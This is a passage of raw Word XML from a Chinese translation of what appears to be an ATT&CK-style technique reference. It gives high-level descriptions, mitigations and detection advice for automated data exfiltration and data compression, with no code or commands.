          <w:p w14:paraId="4A6C3315" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId246" w:history="1">
              <w:r w:rsidR="00BC3074" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33F086B2" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="2CAEE4C6" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="274FF6C4" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId247" w:history="1">
              <w:r w:rsidR="00BC3074" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分区</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41BA8C8D" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>正确配置防火墙和代理，限定外发流量</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>给</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定网段上必需的端口。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C8B5AD1" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1927EA6E" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAE7B1" w14:textId="2B594405" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络数据中不常见的数据流（例如，一个客户端发送的数据比从服务器接收的数据要多得多）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE0C76" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00892CC7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:spacing w:after="312"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5490C589" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:spacing w:after="312"/>
        <w:ind w:left="1560"/>
        <w:sectPr w:rsidR="00A0413E" w:rsidSect="00D7725A">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119BC046" w14:textId="7687B38A" w:rsidR="00A0413E" w:rsidRDefault="004D08E3" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗</w:t>
      </w:r>
      <w:r w:rsidR="008F7150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230991EF" w14:textId="6A399D47" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC5912">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>自动</w:t>
      </w:r>
      <w:r w:rsidR="004D08E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>化数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC5912">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>渗漏</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D08E3" w:rsidRPr="00A65911" w14:paraId="1DC24A12" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="413052B8" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1020</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E22EF6" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：数据渗漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01309692" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="400D149D" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：文件监控，进程监控，网络进程使用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50DCA001" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF32AEB" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41A06011" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4092499D" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在收集过程中收集的数据（如敏感文档）可能会通过自动化处理或脚本渗漏出去。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471ED2EB" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3"/>
    <w:p w14:paraId="048E54C5" w14:textId="200AE512" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动化渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可与其他渗漏技术，例如经由</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据渗漏和</w:t>
      </w:r>
      <w:r w:rsidR="005A5E91">
        <w:t>备用协议上的数据渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结合起来将信息传输到网络之外。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6356C369" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129375AE" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E164238" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F7260C" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程文件访问模式和网络行为。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>有无法识别的进程或脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>似乎正在遍历文件系统并发送网络流量，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E545300" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="004D08E3" w:rsidRDefault="004D08E3" w:rsidP="004D08E3"/>
    <w:p w14:paraId="55D3DF67" w14:textId="147C0005" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC5912">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="004D08E3" w:rsidRPr="00AC5912">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>压缩</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D08E3" w:rsidRPr="00A65911" w14:paraId="07840965" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C2E43DE" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1002</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55EE6022" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：数据渗漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34EAD2F1" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FAB322E" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：二进制文件元数据，文件监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B0E541" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:lastRenderedPageBreak/>
              <w:t>是否需要网络：否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E57C095" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F692581" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD0C073" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会压缩数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前收集的数据（例如，敏感文档）来使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更加</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>轻便</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并将通过网络发送的数据量降至最低。压缩和渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>通道是分开的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。数据是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用自定义程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>通用压缩库</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>实用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>RAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>ZIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zlib</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>来压缩的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673B58B" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2259"/>
        <w:gridCol w:w="7477"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D08E3" w:rsidRPr="004D08E3" w14:paraId="1AFD80A5" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5008976C" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="004D08E3" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D08E3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="74A5E2DF" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="004D08E3" w:rsidRDefault="004D08E3" w:rsidP="004D08E3">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D08E3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D08E3" w:rsidRPr="00A65911" w14:paraId="60E68516" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A3D08B2" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId248" w:history="1">
              <w:r w:rsidR="004D08E3" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62834477" w14:textId="77777777" w:rsidR="004D08E3" w:rsidRPr="00A65911" w:rsidRDefault="004D08E3" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以将网络入侵防御或数据丢失防御工具设置为阻止特定文件类型通过未加密的通道离开网络。在这些情况下，攻击者可能会移向加密通道或使用其他流量封装</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
